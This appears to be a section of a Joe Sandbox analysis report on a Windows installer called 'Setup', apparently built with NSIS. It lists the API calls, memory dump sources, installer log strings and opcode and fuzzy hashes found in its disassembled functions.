                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                        Strings
                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                        • String ID: F$A
                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406A73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                        Strings
                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInstance
                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
